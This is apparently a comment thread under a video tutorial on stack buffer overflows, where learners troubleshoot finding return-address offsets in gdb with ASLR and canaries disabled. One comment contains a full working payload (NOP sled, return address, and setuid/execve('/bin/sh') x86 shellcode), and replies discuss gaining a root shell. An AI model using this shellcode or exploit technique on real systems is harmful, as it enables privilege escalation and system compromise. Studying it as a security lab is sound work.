example:\x03 \xd1 \x00 \x21 \x41 \x41 ...
does this affect somehow the address 0xffffxde0?should i subtract something?
hey daniel slater!! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141. if i try with 262 or something then i am getiing a constant adress as 0x0804848a. Where am i going wrong? why am i not getting 0x42424242 as return adress?
Two things
1. Are you using the correct flags?
2. If 'A'*260 returns 0x41414141 it either means there has been an extreme coincidence (that will never occur unless the program is actually designed for that to occur but that's a discussion for another day) or 4 of your A's are already overwriting the buffer. Because of this if you try with 262it shouldn't work because we know that the return address is somewhere between 0 and 260. If on 256 it still prints 0x41414141 then try 252 and move down in increments of 4 until it returns 42's.
hey Daniel slater, i used all the flags and also disabled ASLR. i have found that my return adress is 4 bytes and located at (112th , 111th , 110th, 109th )positions. i have conluded this by using the command run $(python -c"print('C'*111+'A'*20+'B'*129). when i run this i get the error saying 0x41434343. Now how should i proceed further with this information?
i then used this command run $(python -c "print('\x90'*108+'\x00\xcf\xff\xff'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'\x90'*102)") and then it says process exited normally, but there is no root shell grant. where am i going wrong?
Look at my off by one video and hopefully you'll learn what happened then. The buffer is definitely not at 109 given that the buffer is 256 bytes long. Unless there is a bug in the c compiler (that is triggered by basic problems) you're overwriting part of the return address but not the full thing
Daniel Slater i got sucessfull in accessing the bin/sh... the above print command with the shell code works!!! Thank you so much dude!!! This is the best tutorial ever
You need to compile this with debugging options correct? on any system you're trying to hack they obviously arent going to give that to you so do people just use trial and error in order to find their memory locations?
In the end I get 'program received signal SIGILL, Illegal instruction'I don't know what is the problem...
the error says cannot insert breakpoint 1 and cannot access memory at address: (address name)
Great video, except one question. Why was your entire overflow 272 bytes.
We know the allocated buffer is 256 + 4 for ebp + 4 for ret, so where did the extra 8 bytes come from?
There are a couple of potential things it could have come from, most likely of which is that padding is added for optimisation purposes. As my computer is 64bit (yes I know the program was compiled as 32bit and all operations are executed as though it is 32bit) the stack frame will behave the same as though it is 64bit (note that there are certain instances where this isn't the case.) The stack frame is going to add four bytes of padding as the CPU instruction set is set up for accessing things from the start of the stack frame and manipulations to work on 'misaligned memory' involves more clock cycles. What this basically means is 4 byte variables will 'take up' the width of the stack frame (but only the amount allocated is accessible.)
Note that it is possible to override this optimisation with compiler flags which might be useful if memory on the device was restricted.
Oh sorry just realised I didn't explicit answer the question after that explanation! Because of that it is likely that ebp and ret each take up 8 bytes, totalling 16 so it adds up.
If you want to learn more about memory management and padding I'd recommend playing around in GDB. You can quite easily write some programs that do basic things and then just use GDB and the examine function (demonstrated in this video) to see exactly what is happening. A word of caution though is to look at what optimisation flags if any are set and see what difference that makes
Hi Daniel, thanks for the nice video.
When I run from gdb getting below message:
process 5989 is executing new program: /bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x8048471
When running the executable getting below error:
�����/bin/sh����
Segmentation fault (core dumped)
Any idea why?
Hi Daniel first off great tutorial :)
I seem to be getting an error like most people on here liek another user prud says
"! i got the return adress 0x41414141 at $(python -c"print('A'*260)") itself but when i use $(python -c"print('A'*256+'BBBB')") i get the return adress as 0x41414141." this exact thing is happening to me,I went down in multiples of 4 but when I did I got no seg fault the seg fault only occurs when the total value is 260
any idea why?
thanks (note my ASLR and stack protector is turned off)
at the end I it spawns, then says inferior 1 and exits normally
when i try to find the size of buffer, i get Program received signal SIGSEGV, Segmentation fault.
_IO_fgets (buf=0xbfffe847 "", n=9, fp=0x0) at iofgets.c:50
50 iofgets.c: No such file or directory.
what am i doing wrong?
I am new to these concepts and this process. With that being said is this the command prompt for Ubuntu?
Yes it is
late to the game here but i am not getting a shell and cant understand why my output shows //shh/bin instead of /bin/sh can you help?
I use \x90 with assumption that it will store as a single byte in memory, but it doesn't. It gets store as it is with hex values 3039785c. Even file storing these input or shell code also take more memory than exact no of bytes in them. I am on 64 byte machine and compiling program using m32.
I've addressed this in other comments but you have to think about how memory is stored in C. The short explanation is that padding is added to memory to make it more efficient to access
can you explain how to write the shell code?
Is there a course on udemy or that you know of that can teach me more about this in depth what is this called buffer overflow exploitation?
I can not get the shell to pop at the end.
I wonder is it this:
(gdb) run $(python -c "print('A'*260)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run $(python -c "print('A'*260+'BBBB')")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/pete/bufferoverflow/example $(python -c "print('A'*260+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
0x0804848a in main ()
I do not get 0x42424242 in ?? () I think this is my problem.
same
Something got to do with the OS are you using debian or ubuntu?
I am using Ubuntu 16.02
What compiler settings are you using? If you don't use the proper compiler settings and turn ASLR off then it won't work
Test with both the correct complier setting and ASLR off
Nice
i like your video
in 6:37 how do i make my injection program compile to hex bytes?
What should i do if my esp starts in middle of address and not at the start of the line?
Everything seems to work, except at the end, the "/bin/sh" program isn't run. I get the following instead:
Program received signal SIGILL, Illegal instruction.
0xb7e30a00 in __libc_start_main (main=0x804844d , argc=3,
argv=0xbffff0a4, init=0x8048490 ,
fini=0x8048500 , rtld_fini=0xb7fed180 ,
stack_end=0xbffff09c) at libc-start.c:246
246 libc-start.c: No such file or directory.
I also get this message when looking for the edge of the buffer: run $(python -c "print('A'*268 )")
I know this is an old post, but if anyone has any ideas, I would greatly appreciate it.
In the end why is it showing random characters?
What if the stored input is much smaller like $(python -c "print('A'*28+'BBBB')")? The shell code is 46 bytes. He subtracts it from the 268 (in my case 28). That doesn't fit right?
Yeah that doesn't fit. In reality you need a pretty large buffer because without a NOPSLED you'll need either a lot of luck or a lot of attempts to actually get the right starting address
Daniel Slater Or maybe need smaller shellcode? I'd don't need to get a shell though, just need contents of a file which I can't access (for a challenge just to be clear). This should possible with smaller shellcode I guess. But I'll need to write that myself somehow. Do you have any tuts on how to do that? Thx for the video!
It's probably worth going into how to write shellcode, I don't have any videos on it but it shouldn't be too hard to find
Is there an assembly code that produces the shellcode that you used?
I don't have it readily available but if you want I'm sure you could convert it pretty quickly. Shellcode is the sort of thing that is good to write a few times to get an idea of what it actually is and what's happening but most people just get stuff online because there really isn't any benefit to writing it yourself.
If you want to look at example shellcode and the conversion then check out this link shell-storm.org/shellcode/files/shellcode-827.php
msfvenom
Hi Daniel i am trying but tell me someone please memory converted address to endian is from where ? how did you took this address ?
For what kind of architecture is this shellcode ?
TLDR: 32bit x86
Excellent question. When I made the video x86 was the dominant architecture and it didn't seem like ARM was going to be anywhere near it is today so I didn't even think of other architectures. It's x86 on a 32bit virtual machine running on a 64bit mac.
@@danielslater Wow thank you for your prompt reply! I was testing it myself last night on a kali-linux 2020.4 64bit.
I am using windows 10 64 bit on intel i9-9900k
Was also running in virtual machine so I was wondering when I am looking for shellcode exploits what should I look for? Do I need to install a 32bit Linux? If I do so, do I need a shell code which targets the OS of the virtual machine?
(gdb) disas main
No symbol table is loaded. Use the "file" command.
i got this when i run disas main
wow thanks
So I got the m32 to work, but I still cant insert breakpoints one and access the address
can I see a screenshot of what your shellcode looks like in memory. x/100xb 0xbfff070 or something like that with the shell code in there?
Thank you so mush for the tutorial i guess this tutorial won't work with new ubuntu releases if the are 64 bits do you recommend me to use ubuntu 14 ? i was thinking in downloading ubuntu 14.02 32 bits to be on the safe side please advise thanks in advance
This underlying mechanic of why this works will still be present in all Ubuntu releases for the foreseeable future. This can work with 64bit but you must use the compiler flag -m32 to force it to compile to a 32bit program.
If I was in your position I'd go for the 32bit version as you won't run into problems with that
thank you so mush i ran the experiment on ubuntu 32 bits it worked perfectly , the problem was that cdefs.h was missing in my 64 bit installation although i downloaded the latest release from ubuntu 64-bits and i read in previous comments that others faced the same issue . i wanted to ask you i executed the code on shell ,i copied it from gdb so that the memory doesn't move around and executed the program executed and opened a shell i then gave chmod 777 to my c program the program executed but the shell i obtained was still under user not root i wanted to impress my professor by gaining root access is it feasible using this attack ?
This hack can give you root but the key thing to remember is that you receive the same privilege level that the program is running at. By default you're probably running it as user but you can run it with sudo in front which will make it run as root and therefore after the buffer overflow you will have a shell with root
Thank you so mush :)
No matter how I change the value of 'A' * num to 250, 260 or 1000, I cannot obtain something like 0x41414141. It just shows some normal address like: 0xb7f26411 in __kernal_vsyscall().
How should I proceed? :(
Hello! Have you got a solution to this problem?( Got same
Hey Dan , Nice example. But for me its not working. I get :
Program received signal SIGSEGV, Segmentation fault.
0xf7e68929 in ptmalloc_init.part () from /usr/lib32/libc.so.6
Any ideas ?
Can you confirm that you used the compile line in the video description? I'm willing to bet that's a canary
Yes.I compiled it that way
Hello , while using GDB I am not able to see the function names on the right hand side. ex. any help on how to get that there
So maybe what I've got there is a bit deceptive because it's an exceptionally simple example. The reason strcpy comes up is because it's an inbuilt call, if you create your own function and call it then you can't get the name from the executable because it's simply not stored (it's possible there are compiler flags you can get to get it to store them but not that I know of)
If you're interested in learning more about reverse engineering I'd recommend doing an online course in it or writing your own simple programs and dissembling them to start seeing basic patterns, if you take the second approach I'd recommend looking a bit more into compiler flags because there can be tricks like inlining which could throw you off
I tried your method, copied every step but couldn't able to do it... Why so can anyone answer? Does gdb or gcc making doing something? Or is there any other reason
When asking for debugging help it's useful if you include information about what commands you're running and if anything about your setup is non-standard. Currently it's impossible to give you useful advice
How do you know the adress return ?
What happens if the size of the buffer is smaller than the bytes of the shellcode?
Then you can't use that shell code so you'll either need to shorter shellcode, use some of the already written code as part of your shellcode or use another approach such as ret2libc
What do you do if you try this for a different program and don't find a bunch of 41's...
Unfortunately this is out of the scope of this youtube channel as the answer gets extremely long extremely fast. A lot of security is knowing a lot of techniques for doing something and hoping one works, so I would suggest doing a full pen testing course
Hello, I have an exam this Monday and I am completely lost, please! Can you answer my questions:
Question 0
What is the fault?
What is the purpose of this service?
Which versions are vulnerable?
What version did you use?
Question 1
What protections against this attack
Question 2 !!!
Structure of the stack just before the overflow
Question 3 !!
Structure of the string sent to overflow
Question 4 !!!
Structure of the stack just after the overflow
Question 5 !!
Where does the new return address point? How is it determined?
Question 6!
What code is at this address
Question 7!
What happens to the Shell code?
Question 8
What does the Shell code do?
Question 9
What does your attack do?
Which file is introduced on the victim?
How?
What action does this file take?
how?
Salim BELARBI did u pass ur exam??
I am getting no such file or directory when use gdb ./example
Learning this type of security if you have no programming background is impossible. I'd strongly recommend learning some basic C before trying to broach low level security
a question the /command how this working ????
Add 2 eip
$esp doesn’t work and neither does $rsp . I keep getting “No registers.”
You have to quit after you copy. After you run blahblahblah. Then you disas main. You get your number, copy then quit. Open again then break *yournumber.
I had a rough look
thanks for the whole thing, I have a question where did you open the socket to access the ip address?
how do you connect(remote) to that ip address and port of that software?
Hey sorry to ask so many ques....
I get the following after running....
/bin/dash: 0: Can't open ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[1��C��C
�
��S
�����/bin/sh����
[Inferior 1 (process 9130) exited with code 0177]
ANy idea what could be the prob ?
Are you running this in gdb?
why my machine code is twice as long as yours
Almost have it, but it just won't spawn